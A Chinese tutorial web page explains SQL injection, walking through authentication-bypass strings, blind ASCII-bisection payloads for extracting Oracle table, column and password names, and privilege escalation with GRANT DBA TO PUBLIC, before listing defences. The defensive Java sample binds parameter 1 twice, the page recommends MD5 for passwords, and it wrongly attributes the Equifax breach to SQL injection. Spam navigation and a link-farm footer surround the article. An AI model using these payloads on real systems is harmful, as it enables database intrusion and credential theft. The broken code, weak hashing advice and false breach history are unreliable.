电脑知识|欧美黑人一区二区三区|软件|欧美黑人一级爽快片淫片高清|系统|欧美黑人狂野猛交老妇|数据库|服务器|编程开发|网络运营|知识问答|技术教程文章 - 好吧啦网

您的位置:首頁技術文章
文章詳情頁

一文搞懂SQL注入攻擊

瀏覽:168日期:2023-05-02 10:03:24
目錄
  • 1. 前言
  • 2. SQL注入簡介
    • (1)SQL語言
    • (2)SQL注入
  • 3. SQL注入步驟
    • (1)發(fā)現(xiàn)漏洞
    • (2)信息收集
    • (3)攻擊Web系統(tǒng)(猜解用戶名和密碼)
    • (4)獲取管理員權限
  • 4. 防范SQL注入
    • (1)使用參數(shù)化查詢或存儲過程
    • (2)用戶輸入檢測
    • (3)SQL語法分析
    • (4)其他

1. 前言

隨著互聯(lián)網(wǎng)的發(fā)展和普及,網(wǎng)絡安全問題越來越突出,網(wǎng)絡在為用戶提供越來越多服務的同時,也要面對各類越來越復雜的惡意攻擊。SQL注入(SQL Injection)攻擊是其中最普遍的安全隱患之一,它利用應用程序?qū)τ脩糨斎霐?shù)據(jù)的信任,將惡意SQL代碼注入到應用程序中,從而執(zhí)行攻擊者的操作。這種攻擊可以導致敏感信息泄露、數(shù)據(jù)損壞或刪除及系統(tǒng)癱瘓,給企業(yè)和個人帶來巨大損失。因此,如何防范SQL注入攻擊成為了網(wǎng)絡安全領域的一個重要議題。

在國外,SQL注入最早出現(xiàn)在1999年;在我國大約出現(xiàn)在2002年。2015年,約翰·卡特爾(John McAfee)的網(wǎng)站遭到了SQL注入攻擊,導致黑客獲取了網(wǎng)站上全部的注冊用戶信息。2016年,Yahoo公司披露了兩起大規(guī)模數(shù)據(jù)泄露事件,其中涉及的一次就是通過SQL注入攻擊獲得的。2017年,Equifax公司遭到了一次嚴重的數(shù)據(jù)泄露事件,泄露了超過1.43億條用戶記錄。調(diào)查人員發(fā)現(xiàn),攻擊者使用了SQL注入攻擊。

可見,SQL注入攻擊破壞敏感數(shù)據(jù)的完整性和可用性,給網(wǎng)絡用戶和企業(yè)造成了巨大的生活困擾和經(jīng)濟損失。

2. SQL注入簡介

(1)SQL語言

Structured Query Language(簡稱SQL)是—種結構化查詢語言,一種數(shù)據(jù)庫文本語言。SQL用于同關系數(shù)據(jù)庫進行交互,能夠執(zhí)行對數(shù)據(jù)庫的查詢、獲取數(shù)據(jù)庫的信息、向數(shù)據(jù)庫插入新的紀錄、刪除及更新數(shù)據(jù)庫中的記錄。

SQL有很多種類,但大多都基于ANSI標準SQL-92。SQL執(zhí)行的單位是一個“query”,該“query”可以是一系列語句集合,返回一個結果集。SQL語句可以修改數(shù)據(jù)庫結構(使用數(shù)據(jù)定義語言DDL)和操作數(shù)據(jù)庫內(nèi)容(使用數(shù)據(jù)操作語言DML)。SQL語言本身造成了SQL注入漏洞,給SQL注入攻擊帶來了可能性。

(2)SQL注入

SQL注入攻擊是一種利用應用程序漏洞的攻擊方式。攻擊者通過向應用程序發(fā)送構造的惡意SQL語句,欺騙應用程序執(zhí)行這些SQL語句,如果Web應用沒有適當?shù)尿炞C用戶輸入的信息,攻擊者就有可能改變后臺執(zhí)行的SQL語句的結構,獲取相應結果。攻擊者可以利用SQL注入漏洞獲取數(shù)據(jù)庫中的敏感信息,修改或刪除數(shù)據(jù)庫中的數(shù)據(jù),或者完全控制Web服務器。

比如基于表單登錄功能的應用程序,通過執(zhí)行一個簡單的SQL查詢來確認每次登錄,以下是這個查詢的一個典型實例:

SELECT * FROM users WHERE username="alice" and password="secret"

這個查詢要求數(shù)據(jù)庫檢查用戶表中的每一行,提取username值為alice并且password值為secret的記錄。如果返回一條用戶記錄,該用戶即可成功登錄。

攻擊者可注入用戶名或密碼字段來修改程序執(zhí)行的查詢,一般是輸入雙連字符(--)注釋掉其余部分或類似’ or ‘1’ =‘1用引號包含的字符串數(shù)據(jù)來“平衡引號”,來破壞查詢的邏輯。比如攻擊者可以通過提交用戶名為alice’--alice’ or ‘1’=‘1,密碼為任意,應用程序?qū)?zhí)行以下查詢:

SELECT * FROM users WHERE username="alice"--‘" and password="any"

SELECT * FROM users WHERE username=" alice" or ‘1"=‘1" and password="any"

這兩條查詢均等同于

SELECT * FROM users WHERE username="alice"

從而避開了密碼檢查,成功登錄。

因此SQL注入漏洞本質(zhì)上是針對程序員編程中的漏洞,利用SQL的語法在應用程序與數(shù)據(jù)庫交互的SQL語句中插入精心編制的額外的SQL語句,從而對數(shù)據(jù)庫進行非法查詢和修改。由于程序運行SQL語句時的權限與當前該組建(例如,數(shù)據(jù)庫服務器、Web應用服務器)的權限相同,而這些組件一般的運行權限都很高,而且經(jīng)常是以管理員的權限運行,所以攻擊者可能獲得數(shù)據(jù)庫的完全控制,并執(zhí)行系統(tǒng)命令。

3. SQL注入步驟

SQL注入攻擊有多種類型,包括基于錯誤的注入、聯(lián)合查詢注入、堆疊查詢注入等。其中,基于錯誤的注入是最常見的類型。攻擊者通過發(fā)送包含惡意SQL語句的輸入數(shù)據(jù)來觸發(fā)應用程序中的錯誤,從而獲取有關數(shù)據(jù)庫結構和內(nèi)容的信息。

(1)發(fā)現(xiàn)漏洞

可以用經(jīng)典的1=1,1=2測試法測試SQL注入是否存在。

以http://www.test.com/profile.do?id=113為例,使用以下測試方案:

  • http://www.test.com/profile.do?id=113’
  • http://www.test.com/profile.do?id=113 and 1=1
  • http://www.test.com/profile.do?id=113 and 1=2

(2)信息收集

確認系統(tǒng)表是否存在,主要利用Oracle數(shù)據(jù)庫中以下系統(tǒng)表:

  • all_tables:存放當前ID和其他用戶的所有表
  • user_tables:存放當前用戶所有表
  • user_tab_columns:存放當前用戶表的所有列

測試以下URL:

  • http://www.test.com/profile.do?id=113’and 0<>(select count(*) from all_tables) and '1'='1
  • http://www.test.com/profile.do?id=113’and 0<>(select count(*) from user_tables)and '1'='1
  • http://www.test.com/profile.do?id=113’and 0<>(select count(*) from user_tab_ columns) and '1'='1

 如果以上頁面都能正確返回,說明存在猜測的系統(tǒng)表。

(3)攻擊Web系統(tǒng)(猜解用戶名和密碼)

首先查找當前用戶是否有敏感列名:

"and 0<>(select count(*) from user_tab_columns where column_name like "%25PASS%25") and "1"="1

正常返回說明存在類似PASS的字段,猜解該字段對應的表名。先確定表名的長度(不斷改變length(table_name)后的數(shù)值):

"and 0<>(select count(*) from user_tables where length(table_name)>8 and table_ name like"%25PASS%25") and "1"="1

利用ASCII二分法猜解表名(不斷改變substr函數(shù)的參數(shù)及比較值):

"and  (ascii(substr((select table_name from user_tab_columns where column_name like "%PASS%" And Rownum<=1),1,1))>64) and "1"="1

猜字段同樣先確定長度,然后利用ASCII二分法猜解字段名:

"and 0<>(select count(*) from user_tables where table_name="T_SYSUSER"and length (column_ name) >8  and column_name like "%PASS%") and "1"="1
"and  (ascii(substr((select column_name from user_tab_columns where table_name ="T_SYSUSER" and column_name like "%25PASS%25"),1,1))>64) and "1"="1

得到用戶表的USERNAMEPASSWD兩列的名稱后,依然是利用ASCII碼猜解法來一步一步確定USERNAMEPASSWD的值,不再詳述。

(4)獲取管理員權限

要想獲取對系統(tǒng)的完全控制,還要有系統(tǒng)的管理員權限。Oracle包含許多可在數(shù)據(jù)庫管理員權限下運行的內(nèi)置存儲過程,并發(fā)現(xiàn)在這些存儲過程中存在SQL注入漏洞。2006年7月補丁發(fā)布之前,存在于默認包SYS.DBMS_ EXPORT_EXTERSION.GET_DOMAIN_INDEX_TABLES中的缺陷就是一個典型的示例。攻擊者可以利用這個缺陷,在易受攻擊的字段中注入GRANT DBA TO PUBLIC查詢(需要換成char形式)來提升權限。

這種類型的攻擊可通過利用Web程序中的SQL注入漏洞,在易受攻擊的參數(shù)中輸入函數(shù)來實現(xiàn)。許多其他類型的缺陷也影響到Oracle的內(nèi)置組件。一個示例是CTXSYS.DRILOAD.VALIDATE_STMT函數(shù)。這個函數(shù)的目的是檢查一個指定的字符串中是否包含一個有效的SQL語句。早期Oracle版本中,在確定被提交的語句的過程中,這個函數(shù)實際執(zhí)行了該語句。這意味著任何用戶只需向這個函數(shù)提交一個語句,就能夠作為數(shù)據(jù)庫管理員執(zhí)行該語句。例如:

exec CTXSYS.DRILOAD.VALIDATE_STMT(‘GRANT DBA TO PUBLIC")

除這些漏洞外,Oracle還含有大量默認功能,這些功能可被低權限用戶訪問,并可用于執(zhí)行各種敏感操作,建立網(wǎng)絡連接或訪問文件系統(tǒng)。比如,可利用UTL_HTTP 包里面的 request函數(shù)構造注射,來建立用戶,并賦予DBA權限。

4. 防范SQL注入

(1)使用參數(shù)化查詢或存儲過程

參數(shù)化查詢分兩個步驟建立一個包含用戶輸入的SQL語句:

  • 應用程序制定查詢結構,為用戶輸入的每個數(shù)據(jù)預留占位符;
  • 應用程序制定每個占位符的內(nèi)容。
    在第二步中指定的專門設計的數(shù)據(jù)無法破壞在第一步中指定的查詢結構。由于查詢結構已經(jīng)確定,且相關API 對任何類型的占位符數(shù)據(jù)進行安全處理,因此它總被解釋為數(shù)據(jù),而非語句結構的一部分。

 Java提供以下API,允許應用程序創(chuàng)建一個預先編譯的SQL語句,并以可靠且類型安全的方式指定它的參數(shù)占位符的值:

 java.sql.Connection.prepareStatement
 java.sql.PrepareStatement.*

使用如下:

String username = request.getParameter("j_username");
String passwd = request.getParameter("j_password");
String query = "select * from t_sysuser where username=? and passwd=?";
PreparedStatement stmt = con.prepareStatement(query);
stmt.setString(1, username);
stmt.setString(1, passwd);
ResultSet rs=stmt.executeQuery();

如果用戶提交的用戶名為alice’ or 1=1--,密碼為any,生成的查詢等同于:

select * from t_sysuser where username= ‘a(chǎn)lice" ‘or 1=1--" and passwd="any"

由此可見使用參數(shù)化查詢可以有效防止SQL注入,應在每一個數(shù)據(jù)庫查詢中使用參數(shù)化查詢。如果僅注意用戶直接提交的輸入,二階SQL注入攻擊就很容易被忽略因為已經(jīng)被處理的數(shù)據(jù)被認為是可信的。另外參數(shù)占位符不能用于指定查詢中表和列的名稱,如果應用程序需要根據(jù)用戶提交的數(shù)據(jù)在SQL查詢中指定這些數(shù)據(jù)行,需要使用一份由已知可靠的值組成的“白名單”(即數(shù)據(jù)庫中表和列的名稱),并拒絕任何與這份名單上數(shù)據(jù)不匹配的輸入項。或者對用戶輸入實施嚴格的確認機制。

使用存儲過程的原理與參數(shù)化查詢類似,傳入的參數(shù)在最后被執(zhí)行的SQL語句中會被數(shù)據(jù)庫服務器軟件進行處理,使得輸入的字符串會被當作一個單純的文本參數(shù)參與到SQL查詢中。不論是攻擊者輸入什么參數(shù)都不會改變設計者編寫的SQL語句的語義,也就防止了SQL注入。另外由于存儲過程是預編譯的,對復雜的SQL語句,效率有很大程度上的提升,還可以進一步減少查詢時客戶端發(fā)送到服務端的數(shù)據(jù)包。

(2)用戶輸入檢測

對輸入進行檢測一般是在客戶端和服務器端利用正則表達式來匹配SQL的特殊字符及其等值的十六進制形式,包括單引號(’)、雙重破折號(–)、SELECT、UNION等查詢關鍵字,然后對其進行替換或者過濾。但是在所有的接受輸入的程序部分都嚴格的執(zhí)行檢測卻很難,而且會產(chǎn)生誤報。

(3)SQL語法分析

SQL注入根源在于對于用戶提交的請求沒有足夠的驗證機制,正常的用戶輸入是具有邏輯整體含義的簡單結構,而實施 SQL 注入的字符串一定是包含 SQL語法片段的復合結構。 SQL 注入攻擊本質(zhì)上是希望后臺數(shù)據(jù)庫的 SQL 解釋程序按照不同的方式解釋組裝好的 SQL 語句,如果用戶輸入的字符串不包含 SQL 語法片段,顯然無法達到這個目的。

靜態(tài)代碼分析中能從語法、語義上理解程序行為,直接分析被測程序特征,尋找可能導致錯誤的異常。因此可以在服務器端采用一種類似于靜態(tài)代碼分析的SQL 語法預分析策略來防止SQL注入。首先將 SQL 注入分類,并對其進行詞法分析和語法分析,抽象出各類注入的語法結構,生成語法分析樹;能夠利用該語法分析樹通過機器學習的方法來得到預想的SQL注入的集合,并從該集合中生成新的語法分析樹;然后將用戶提交的輸入預先組裝成完整的 SQL 語句,對該語句進行語法分析,如果發(fā)現(xiàn)具有 SQL 注入特征的語法結構,則判定為 SQL 注入攻擊。判定的唯一依據(jù)是抽象的語法結串,而非具體的特征字符串,避免了傳統(tǒng)的特征字符串匹配策略固有的高識別率和低誤判率之間的矛盾。

由于SQL注入利用的是正常的服務端口,在各類Web應用中已不能通過使用防火墻,SSL等網(wǎng)絡層保護技術來阻止應用層攻擊,也就是說安全邊界擴展到了系統(tǒng)源代碼。因此,必須通過防范軟件代碼中存在的安全漏洞,從而保障系統(tǒng)的安全。

(4)其他

通過在程序中對口令等敏感信息加密,(一般采用MD5函數(shù)),另外在原來的加密的基礎上可以增加一些非常規(guī)的方式,即在MD5加密的基礎上附帶一些值 如密文=MD5 (MD5 (明文)+系統(tǒng)時間);編碼時注意屏蔽網(wǎng)頁上顯示的異常與出錯信息,并對源代碼進行安全審查及軟件安全測試。

安全配置服務器,包括目錄最小化權限設置:給靜態(tài)網(wǎng)頁目錄和動態(tài)網(wǎng)頁目錄分別設置不同權限,盡量不給寫目錄權限;修改或者去掉 Web 服務器上默認的一些危險命令,例如ftp、cmd等 需要時再復制到相應目錄;正確配置iptables及Oracle的sqlnet.ora文件,通過IP地址限制對于數(shù)據(jù)庫訪問。

以上就是一文搞懂SQL注入攻擊的詳細內(nèi)容,更多關于SQL注入攻擊的資料請關注其它相關文章!

標簽: MsSQL
相關文章:
主站蜘蛛池模板: 重庆网站建设,重庆网站设计,重庆网站制作,重庆seo,重庆做网站,重庆seo,重庆公众号运营,重庆小程序开发 | 激光内雕_led玻璃_发光玻璃_内雕玻璃_导光玻璃-石家庄明晨三维科技有限公司 激光内雕-内雕玻璃-发光玻璃 | 北京开源多邦科技发展有限公司官网 | 轴承振动测量仪电箱-轴承测振动仪器-测试仪厂家-杭州居易电气 | 胜为光纤光缆_光纤跳线_单模尾纤_光纤收发器_ODF光纤配线架厂家直销_北京睿创胜为科技有限公司 - 北京睿创胜为科技有限公司 | 时代北利离心机,实验室离心机,医用离心机,低速离心机DT5-2,美国SKC采样泵-上海京工实业有限公司 工业电炉,台车式电炉_厂家-淄博申华工业电炉有限公司 | 【黄页88网】-B2B电子商务平台,b2b平台免费发布信息网 | 广西教师资格网-广西教师资格证考试网 | 超声骨密度仪,双能X射线骨密度仪【起草单位】,骨密度检测仪厂家 - 品源医疗(江苏)有限公司 | 塑胶跑道施工-硅pu篮球场施工-塑胶网球场建造-丙烯酸球场材料厂家-奥茵 | 橡胶弹簧|复合弹簧|橡胶球|振动筛配件-新乡市永鑫橡胶厂 | 武汉高温老化房,恒温恒湿试验箱,冷热冲击试验箱-武汉安德信检测设备有限公司 | 培训中心-海南香蕉蛋糕加盟店技术翰香原中心官网总部 | 广州展览制作|展台制作工厂|展览设计制作|展览展示制作|搭建制作公司 | 涿州网站建设_网站设计_网站制作_做网站_固安良言多米网络公司 | 不锈钢法兰-碳钢法兰-法兰盘生产加工厂家-[鼎捷峰]-不锈钢法兰-碳钢法兰-法兰盘生产加工厂家-[鼎捷峰] | 欧版反击式破碎机-欧版反击破-矿山石料破碎生产线-青州奥凯诺机械 | 股指期货-期货开户-交易手续费佣金加1分-保证金低-期货公司排名靠前-万利信息开户 | 欧景装饰设计工程有限公司-无锡欧景装饰官网 | 清水混凝土修复_混凝土色差修复剂_混凝土色差调整剂_清水混凝土色差修复_河南天工 | 四川实木门_成都实木门 - 蓬溪聚成门业有限公司 | 天津云仓-天津仓储物流-天津云仓一件代发-顺东云仓 | 耐酸泵,耐酸泵厂家-淄博华舜耐腐蚀真空泵 | 鑫达滑石-辽宁鑫达滑石集团 | 锂电混合机-新能源混合机-正极材料混料机-高镍,三元材料混料机-负极,包覆混合机-贝尔专业混合混料搅拌机械系统设备厂家 | 污水处理设备维修_污水处理工程改造_机械格栅_过滤设备_气浮设备_刮吸泥机_污泥浓缩罐_污水处理设备_污水处理工程-北京龙泉新禹科技有限公司 | 深圳美安可自动化设备有限公司,喷码机,定制喷码机,二维码喷码机,深圳喷码机,纸箱喷码机,东莞喷码机 UV喷码机,日期喷码机,鸡蛋喷码机,管芯喷码机,管内壁喷码机,喷码机厂家 | 【同风运车官网】一站式汽车托运服务平台,验车满意再付款 | 顶空进样器-吹扫捕集仪-热脱附仪-二次热解吸仪-北京华盛谱信仪器 | 淄博不锈钢,淄博不锈钢管,淄博不锈钢板-山东振远合金科技有限公司 | 避光流动池-带盖荧光比色皿-生化流动比色皿-宜兴市晶科光学仪器 东莞爱加真空科技有限公司-进口真空镀膜机|真空镀膜设备|Polycold维修厂家 | 石油/泥浆/不锈钢防腐/砂泵/抽砂泵/砂砾泵/吸砂泵/压滤机泵 - 专业石油环保专用泵厂家 | 酒精检测棒,数显温湿度计,酒安酒精测试仪,酒精检测仪,呼气式酒精检测仪-郑州欧诺仪器有限公司 | 云南丰泰挖掘机修理厂-挖掘机维修,翻新,再制造的大型企业-云南丰泰工程机械维修有限公司 | 污水/卧式/潜水/钻井/矿用/大型/小型/泥浆泵,价格,参数,型号,厂家 - 安平县鼎千泵业制造厂 | 防勒索软件_数据防泄密_Trellix(原McAfee)核心代理商_Trellix(原Fireeye)售后-广州文智信息科技有限公司 | 成都APP开发-成都App定制-成都app开发公司-【未来久】 | 常州翔天实验仪器厂-恒温振荡器-台式恒温振荡器-微量血液离心机 恒温恒湿箱(药品/保健品/食品/半导体/细菌)-兰贝石(北京)科技有限公司 | 一体化预制泵站-一体化提升泵站-一体化泵站厂家-山东康威环保 | 广西正涛环保工程有限公司【官网】 | 深圳激光打标机_激光打标机_激光焊接机_激光切割机_同体激光打标机-深圳市创想激光科技有限公司 深圳快餐店设计-餐饮设计公司-餐饮空间品牌全案设计-深圳市勤蜂装饰工程 |